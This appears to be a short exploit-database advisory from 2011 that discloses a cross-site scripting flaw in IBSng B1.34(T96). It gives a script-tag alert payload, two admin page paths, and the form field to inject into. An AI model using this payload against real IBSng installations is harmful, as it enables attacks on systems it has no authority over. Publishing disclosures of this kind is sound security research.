IBSng version B1.34(T96) suffers from a cross site scripting vulnerability.
bfbfe0f0fcb20027aaf2760446af1a091a3864977f34589aeb9f53e9f24d0c5d
# Exploit Title: [XSS vulnerabilitiy in IBSng]
# Date: [12-07-2011]
# Author: [nImaarek]
# Software Link: [http://sourceforge.net/projects/ibs/]
# Version: [B1.34(T96)]
# Tested on: [CentsOs 5.5]
# Home : Pentesters.ir | sepehr-team.org
~ (Exploit) ~
~ ("><script>alert('xss')</script>) ~
1 . http://<=- Domain -=>/IBSng/admin/user/search_user.php
2 . http://<=- Domain -=>/IBSng/admin/mc/send_new_message.php
Please put the xss code in the To(UserName)